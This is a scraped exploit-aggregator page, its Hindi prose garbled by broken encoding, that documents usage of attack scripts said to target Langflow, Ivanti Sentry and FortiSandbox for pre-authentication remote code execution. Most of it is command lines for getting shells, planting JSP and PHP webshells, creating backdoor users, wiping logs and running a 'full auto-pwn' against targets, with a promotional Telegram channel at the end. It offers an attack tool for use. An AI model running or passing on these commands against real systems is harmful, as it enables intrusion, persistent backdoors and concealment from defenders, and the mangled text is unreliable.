## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LAYER-6-CVE-2026-5027-LANGFLOW
# (CVE-2026-5027) рдФрд░ (CVE-2026-10520) (CVE-2026-25089) рд╢реЛрд╖рдг рдЙрдкрдХрд░рдг:
## рдХреНрд▓реЛрди рдХрд░реЗрдВ
root@kitploit:~
git clone https://github.com/Layer-6/CVE-2026-5027-Langflow.git
cd CVE-2026-5027-Langflow
# рдЙрдкрдпреЛрдЧ (exploit.py) рдлрд╝рд╛рдЗрд▓
# рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рдкрд░реАрдХреНрд╖рдг рдФрд░ рд╢реЛрд╖рдгред
root@kitploit:~
python3 exploit.py -u https://target.com
## CLI рдХрд╕реНрдЯрдо рд╕реЗрдЯрд┐рдВрдЧреНрд╕
## рдЬрдм рд╢реЗрд▓ рдХрд┐рд╕реА рдлрд╝реЛрд▓реНрдбрд░ рдХреЗ рдЕрдВрджрд░ рд╣реЛ рддреЛ рдЕрдкрдирд╛ рд╕реНрд╡рдпрдВ рдХрд╛ рд╡реЗрдмрд╢реЗрд▓ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ:
root@kitploit:~
python3 exploit.py -u https://target.com --shell
(ЁЯУБshells/my-shell.php)
# рдЬрдм рд╢реЗрд▓ рдЯреВрд▓ рдлрд╝реЛрд▓реНрдбрд░ рдореЗрдВ рд╣реЛ рдпрд╛ рдмрд┐рдирд╛ рдлрд╝реЛрд▓реНрдбрд░ рдХреЗ рдЯрд░реНрдорд┐рдирд▓ рдХреЗ рдЕрдВрджрд░ рд╣реЛ:
root@kitploit:~
python3 exploit.py -u https://target.com --shell my-shell.php
# рдЖрдкрдХрд╛ рд╡реЗрдмрд╢реЗрд▓ (PHP, Python (CGI), Perl, Ruby, ASPX) рд╣реЛ рд╕рдХрддрд╛ рд╣реИред
# рдЖрдк --t рдХреЗ рд╕рд╛рде рдЯрд╛рдЗрдордЖрдЙрдЯ рд╕реЗрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ --p рдХреЗ рд╕рд╛рде рдлрд╝реЛрд▓реНрдбрд░реЛрдВ рдФрд░ рдлрд╝рд╛рдЗрд▓реЛрдВ рд╕реЗ рдкреЗрд▓реЛрдб рдпрд╛ рдХрд╕реНрдЯрдо рдкрде рд▓реЛрдб/рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:
root@kitploit:~
python3 exploit.py -u https://target.com | -t 58 | |-p payloads.txt | | --upload-paths Dirs.txt |
## рдЙрджрд╛рд╣рд░рдг:
root@kitploit:~
python3 exploit.py -u https://target.com --shell shells/myshell.php -t 58 -p payloads.txt --upload-paths dirs.txt
## рдЙрдкрдпреЛрдЧ (exploitt.py) рдлрд╝рд╛рдЗрд▓
# рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд CVE рдХреЗ рд▓рд┐рдП рдбрд┐рдЬрд╝рд╛рдЗрди рдХрд┐рдпрд╛ рдЧрдпрд╛:
# ┬╖ CVE-2026-10520 (CVSS 10.0)
┬╖ CVE-2026-25089 (CVSS 9.1)
## рдкреНрд░реА-рдСрде рд░рд┐рдореЛрдЯ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди
рдХреЛрдИ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдЖрд╡рд╢реНрдпрдХ рдирд╣реАрдВред
# ЁЯУЦ рдЙрдкрдпреЛрдЧ
# рддреНрд╡рд░рд┐рдд рдкреНрд░рд╛рд░рдВрдн - рдЗрдВрдЯрд░реИрдХреНрдЯрд┐рд╡ рдореЗрдиреВ (рдХреЛрдИ рддрд░реНрдХ рдирд╣реАрдВ)
root@kitploit:~
python3 exploitt.py
# рдлрд┐рд░ рдирд┐рд░реНрджреЗрд╢реЛрдВ рдХрд╛ рдкрд╛рд▓рди рдХрд░реЗрдВ:
# 1\. рд▓рдХреНрд╖реНрдп рдкреНрд░рдХрд╛рд░ рдЪреБрдиреЗрдВ (Ivanti рдпрд╛ Forti)
2. рд▓рдХреНрд╖реНрдп URL рджрд░реНрдЬ рдХрд░реЗрдВ (рдЙрджрд╛. https://192.168.1.100:8443)
3. рдЯрд╛рдЗрдордЖрдЙрдЯ, рдкреНрд░реЙрдХреНрд╕реА, рдбреАрдмрдЧ рдореЛрдб рд╕реЗрдЯ рдХрд░реЗрдВ
4. рдХреНрд░рд┐рдпрд╛ рдЪреБрдиреЗрдВ (рдХрдорд╛рдВрдб, рд╢реЗрд▓, рд╡реЗрдмрд╢реЗрд▓, рдЖрджрд┐)
# рдХрдорд╛рдВрдб рд▓рд╛рдЗрди (рдЙрдиреНрдирдд)
# 1\. Ivanti Sentry (CVE-2026-10520)
root@kitploit:~
# Check if vulnerable
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -c "id"
# Interactive shell
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -s
# Deploy JSP webshell (Tomcat)
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -w
# Create backdoor user + clean logs
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -p --clean
2. FortiSandbox (CVE-2026-25089)
root@kitploit:~
# Single command
python3 exploitt.py -u https://forti.example.com --type forti -c "whoami"
# Interactive shell with file upload
python3 exploitt.py -u https://forti.example.com --type forti -s
# Inside shell: upload /path/local.txt /remote/path.txt
# Deploy PHP webshell
python3 exploitt.py -u https://forti.example.com --type forti -w
# Full autoтАСpwn (check, shell, webshell, persist, clean)
python3 exploitt.py -u https://forti.example.com --type forti -s -w -p --clean
3. рд╕реНрд╡рддрдГ-рдкрд╣рдЪрд╛рди (рд╕реНрдХреНрд░рд┐рдкреНрдЯ рд╕реЗрд╡рд╛ рдХрд╛ рдЕрдиреБрдорд╛рди рд▓рдЧрд╛рддреА рд╣реИ)
root@kitploit:~
python3 exploitt.py -u https://target.example.com -c "id"
4. рдкреНрд░реЙрдХреНрд╕реА рдФрд░ рдбреАрдмрдЧ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ
root@kitploit:~
python3 exploitt.py -u https://target:8443 --proxy http://127.0.0.1:8080 --debug -c "uname -a"
рдЙрдкрд▓рдмреНрдз рдХрдорд╛рдВрдб-рд▓рд╛рдЗрди рддрд░реНрдХ
рдЗрдВрдЯрд░реИрдХреНрдЯрд┐рд╡ рд╢реЗрд▓ рдХрдорд╛рдВрдб
рдЗрдВрдЯрд░реИрдХреНрдЯрд┐рд╡ рд╢реЗрд▓ рдХреЗ рдЕрдВрджрд░ рдЖрдк рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:
рдХрдорд╛рдВрдб| рдЙрджрд╛рд╣рд░рдг| рд╡рд┐рд╡рд░рдг
---|---|---
normal command| `id`| рдХреЛрдИ рднреА рд╕рд┐рд╕реНрдЯрдо рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ
рд╡реЗрдмрд╢реЗрд▓ рдкрд░рд┐рдирд┐рдпреЛрдЬрди рд╡рд┐рд╡рд░рдг
┬╖ Ivanti Sentry тАУ Tomcat webapps рдХреЗ рдЕрдВрджрд░ рдПрдХ .jsp рд╢реЗрд▓ рдкрд░рд┐рдирд┐рдпреЛрдЬрд┐рдд рдХрд░рддрд╛ рд╣реИ (/usr/local/tomcat/webapps/ROOT/) ┬╖ рдПрдХреНрд╕реЗрд╕ рдХрд░реЗрдВ: https://target/shell_random.jsp?cmd=whoami ┬╖ FortiSandbox тАУ рд╡реЗрдм рд░реВрдЯ рдХреЗ рдЕрдВрджрд░ рдПрдХ .php рд╢реЗрд▓ рдкрд░рд┐рдирд┐рдпреЛрдЬрд┐рдд рдХрд░рддрд╛ рд╣реИ (/var/www/html/) ┬╖ рдПрдХреНрд╕реЗрд╕ рдХрд░реЗрдВ: https://target/shell_random.php?cmd=whoami
рдЙрджрд╛рд╣рд░рдг рдХрд╛рд░реНрдпрдкреНрд░рд╡рд╛рд╣ (рд╕рдВрдкреВрд░реНрдг рдкреИрда рдкрд░реАрдХреНрд╖рдг)
root@kitploit:~
# 1. Detect and exploit
python3 exploitt.py -u https://victim.com:8443 --type ivanti -s
# 2. Inside the shell, check privileges
id
# 3. Deploy webshell for persistence
python3 exploitt.py -u https://victim.com:8443 --type ivanti -w
# 4. Create a backdoor user
python3 exploitt.py -u https://victim.com:8443 --type ivanti -p
# 5. Clean logs
python3 exploitt.py -u https://victim.com:8443 --type ivanti --clean
# Red рдЯреЗрд▓реАрдЧреНрд░рд╛рдо рдЪреИрдирд▓ рджреНрд╡рд╛рд░рд╛:
https://t.me/Red_Rooted_Ghost